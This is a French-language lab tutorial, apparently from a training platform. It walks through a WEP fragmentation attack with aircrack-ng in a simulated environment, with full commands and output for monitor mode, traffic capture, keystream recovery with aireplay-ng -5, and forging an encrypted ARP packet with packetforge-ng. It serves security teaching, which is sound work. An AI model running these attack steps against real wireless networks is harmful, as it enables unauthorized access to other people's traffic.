Introduction
Dans ce laboratoire, vous apprendrez comment effectuer une attaque par fragmentation contre un réseau chiffré avec WEP (Wired Equivalent Privacy). L'attaque par fragmentation est une technique qui permet à un attaquant d'obtenir une petite quantité du flux de clés WEP (spécifiquement, l'algorithme de génération pseudo-aléatoire ou PRGA) sans connaître la clé WEP elle-même.
Une fois ce flux de clés obtenu, il peut être utilisé pour créer de nouveaux paquets chiffrés valides. Ces paquets forgés peuvent ensuite être réinjectés dans le réseau pour stimuler le trafic, ce qui est une étape cruciale pour casser la clé WEP complète.
Vous utiliserez la suite d'outils aircrack-ng pour accomplir cela. Le processus implique la surveillance du réseau cible, le lancement de l'attaque par fragmentation pour obtenir un fichier XOR PRGA, puis l'utilisation de ce fichier pour forger un paquet ARP.
Obtention d'un paquet de données à partir du point d'accès cible avec airodump-ng
Dans cette étape, vous préparerez votre interface sans fil à la surveillance, puis vous utiliserez airodump-ng pour capturer le trafic du point d'accès (AP) cible. L'objectif est de capturer au moins un paquet de données, ce qui est requis pour l'attaque par fragmentation.
Tout d'abord, vous devez mettre votre interface sans fil en mode moniteur. Ce mode permet à la carte réseau d'écouter tout le trafic Wi-Fi dans l'air, pas seulement le trafic qui lui est adressé. Nous utiliserons la commande airmon-ng sur l'interface wlan1.
Exécutez la commande suivante dans votre terminal :
sudo airmon-ng start wlan1
Cette commande créera une nouvelle interface en mode moniteur, généralement nommée wlan1mon. La sortie confirmera le nom de la nouvelle interface.
PHY Interface Driver Chipset
phy1 wlan1 mac80211_hwsim Software simulator
(monitor mode enabled on wlan1mon)
Maintenant, utilisez airodump-ng pour trouver notre AP cible, "TestWEP", et capturer son trafic dans un fichier. Nous spécifierons le BSSID (02:00:00:00:00:00), le canal (1) et un préfixe de fichier (capture) pour les fichiers de sortie.
Exécutez cette commande. Laissez-la s'exécuter pendant environ 30 à 60 secondes jusqu'à ce que vous voyiez le compte #Data pour l'AP augmenter, ce qui indique que des paquets de données sont capturés.
sudo airodump-ng --bssid 02:00:00:00:00:00 -c 1 -w capture wlan1mon
Vous verrez une sortie similaire à celle-ci. Attendez que la colonne #Data affiche une valeur supérieure à 0.
CH 1 ][ Elapsed: 30 s ][ 2023-10-27 10:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:00:00 -30 25 5 1 1 54 WEP WEP TestWEP
BSSID STATION PWR Rate Lost Frames Probe
Une fois que vous voyez que des paquets de données ont été capturés, appuyez sur Ctrl+C pour arrêter airodump-ng. Vous pouvez utiliser la commande ls pour voir le fichier de capture généré, qui sera nommé capture-01.cap.
Lancement de l'attaque par fragmentation avec aireplay-ng -5
Dans cette étape, vous lancerez l'attaque par fragmentation en utilisant aireplay-ng. Cette attaque écoute un paquet provenant de l'AP cible, et une fois qu'elle en capture un, elle l'utilisera pour tenter de déterminer le flux de clés PRGA.
La commande pour cette attaque est aireplay-ng -5. Vous devez spécifier le BSSID de l'AP cible avec l'option -b et le nom de votre interface moniteur.
Exécutez la commande suivante pour lancer l'attaque.
sudo aireplay-ng -5 -b 02:00:00:00:00:00 wlan1mon
Après avoir exécuté la commande, aireplay-ng commencera à écouter un paquet approprié. Le terminal affichera un message indiquant qu'il attend.
Waiting for a data packet...
Read 221 packets...
L'outil continuera à lire les paquets jusqu'à ce qu'il en trouve un qui puisse être utilisé pour l'attaque. Dans l'étape suivante, vous interagirez avec ce processus une fois qu'un paquet approprié sera trouvé. Pour l'instant, laissez-le simplement s'exécuter.
Attendre le message 'Use this packet' de aircrack-ng
Dans cette étape, vous continuerez le processus démarré avec aireplay-ng. Après un court instant, aireplay-ng devrait capturer un paquet utilisable et vous demandera une confirmation.
L'outil affichera les détails du paquet et vous demandera si vous souhaitez l'utiliser.
Waiting for a data packet...
Read 280 packets...
A suitable packet found!
Size: 68
1. Use this packet? (y/n)
Lorsque vous voyez l'invite Use this packet? (y/n), tapez y et appuyez sur Entrée.
y
Après confirmation, aireplay-ng tentera de reconstruire le PRGA à partir du paquet. En cas de succès, il enregistrera le flux de clés dans un fichier .xor dans votre répertoire actuel (~/project). La sortie ressemblera à ceci :
Saving chosen packet to replay_src-1027-100500.cap
Trying to get 68 bytes of keystream
Got keystream!!
Saved keystream in fragment-1027-100501.xor
Now you can build a packet with packetforge-ng
Cela confirme que l'attaque a réussi et que le flux de clés a été enregistré. Le fichier .xor est la clé pour forger de nouveaux paquets.
Générer un fichier XOR de PRGA à partir de l'attaque réussie
Dans cette étape, vous confirmerez que le fichier de flux de clés PRGA a été créé avec succès par l'attaque par fragmentation. Ce fichier, qui a une extension .xor, contient la partie du flux de clés que nous avons récupérée.
Comme vous l'avez vu dans la sortie de l'étape précédente, aireplay-ng enregistre automatiquement le fichier. Vous pouvez vérifier son existence en utilisant la commande ls -l pour lister les fichiers de votre répertoire actuel.
ls -l
La sortie devrait montrer plusieurs fichiers, y compris le fichier capture-01.cap d'airodump-ng et, plus important encore, le nouveau fichier .xor. Le nom du fichier variera en fonction de la date et de l'heure.
total 20
-rw-r--r-- 1 root root 119 Oct 27 10:02 capture-01.cap
-rw-r--r-- 1 root root 68 Oct 27 10:05 fragment-1027-100501.xor
-rw-r--r-- 1 root root 114 Oct 27 10:01 hostapd-wep.conf
-rw-r--r-- 1 root root 96 Oct 27 10:05 replay_src-1027-100500.cap
La présence du fichier fragment-*.xor confirme que vous disposez du composant nécessaire pour forger un nouveau paquet à l'étape suivante.
Utiliser le fichier XOR pour forger des paquets ARP pour l'injection
Dans cette étape, vous utiliserez le flux de clés PRGA récupéré pour forger un nouveau paquet. Nous allons créer un paquet de requête ARP en utilisant packetforge-ng. Ce paquet forgé peut ensuite être injecté dans le réseau pour générer plus de trafic, ce qui est utile pour d'autres attaques comme le cassage de la clé WEP.
Tout d'abord, vous devez connaître l'adresse MAC de votre interface d'attaque (wlan1). Vous pouvez la trouver avec la commande ip addr.
ip addr show wlan1
La sortie affichera votre adresse MAC. Dans cet environnement simulé, elle est 02:00:00:00:01:00.
3: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
Maintenant, construisez la commande packetforge-ng.
-0: Spécifie un paquet de requête ARP.-a: Le BSSID du point d'accès cible (02:00:00:00:00:00).-h: L'adresse MAC source (votre MAC,02:00:00:00:01:00).-k: L'adresse IP de destination (nous utiliserons une adresse IP de diffusion courante,192.168.1.255).-l: L'adresse IP source (nous utiliserons une adresse IP source courante,192.168.1.100).-y: Le chemin vers le fichier.xor. Nous pouvons utiliser$(ls *.xor)pour utiliser automatiquement le fichier.-w: Le nom du fichier de sortie pour notre paquet forgé, par exemple,arp-packet.cap.
Exécutez la commande :
packetforge-ng -0 -a 02:00:00:00:00:00 -h 02:00:00:00:01:00 -k 192.168.1.255 -l 192.168.1.100 -y $(ls *.xor) -w arp-packet.cap
L'outil confirmera qu'il a créé le paquet.
Wrote packet to arp-packet.cap
Vous avez maintenant créé avec succès un paquet ARP valide et chiffré sans connaître la clé WEP. Vous pouvez vérifier sa création avec ls. Ce paquet est maintenant prêt à être injecté dans le réseau.
Résumé
Dans ce laboratoire, vous avez réussi à effectuer une attaque par fragmentation WEP. Vous avez appris une technique fondamentale dans l'analyse de la sécurité Wi-Fi héritée.
Vous avez commencé par configurer une interface en mode moniteur avec airmon-ng et capturer des paquets de données à partir d'un point d'accès cible en utilisant airodump-ng. Ensuite, vous avez lancé l'attaque par fragmentation principale avec aireplay-ng -5, ce qui vous a permis de récupérer une partie du flux de clés WEP.
Enfin, vous avez utilisé le flux de clés récupéré et packetforge-ng pour créer un paquet de requête ARP personnalisé et chiffré à partir de zéro. Ce paquet forgé est un outil essentiel pour des attaques plus avancées, telles que les attaques par rejeu de requêtes ARP, qui génèrent rapidement les milliers de paquets nécessaires pour casser une clé WEP.